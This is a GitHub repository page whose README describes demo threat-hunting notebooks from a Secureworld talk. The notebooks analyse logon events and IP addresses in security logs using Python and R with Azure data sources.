Skip to content
Repository with Sample threat hunting notebooks on Security Event Log Data Sources
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
rawdata
Azure Data Explorer Python Demo.ipynb
Azure Data Explorer- Kqlmagic Demo.ipynb Added kqlmagic demo - Jupyter extension for Azure Data Explorer Jan 11, 2019
Azure Data Lake with anomalize R Demo.ipynb Demo Files from Secuureworld presentation Nov 9, 2018
README.md
threat-hunting-with-ipaddress-from-logs-Public.ipynb demo notebook with ip address in logs Feb 22, 2019

README.md

threat-hunting-with-notebooks

Demo files associated with "Threat Hunting with Notebook technologies" presented at Secureworld conferernce in Seattle, WA
https://events.secureworldexpo.com/agenda/seattle-wa-2018/

Presentation: https://www.slideshare.net/ashwin_patil/threat-hunting-using-notebook-technologies

Github jupyter notebook viewer does not parse well, use online services such as nbviewer: https://nbviewer.jupyter.org or mybinder: https://mybinder.org/ to view and interact with notebooksby providing github notebook/repo URL.

Same repo is also cloned and available at azure notebooks:
https://notebooks.azure.com/ashwinrp/projects/threat-hunting-with-notebooks

Basic Data Analysis and Visualization on Failed Logon Data

  • Data Source : Azure Data Explorer
  • Language: Python


Time series anomaly detection on successful logon data using anomalize package

  • Data Source : Azure Data Lake
  • Language: R


Threat Hunting with ip address from logs

  • Data Source : csv file with 4688 along with command line logs
  • Language: Python
You can’t perform that action at this time.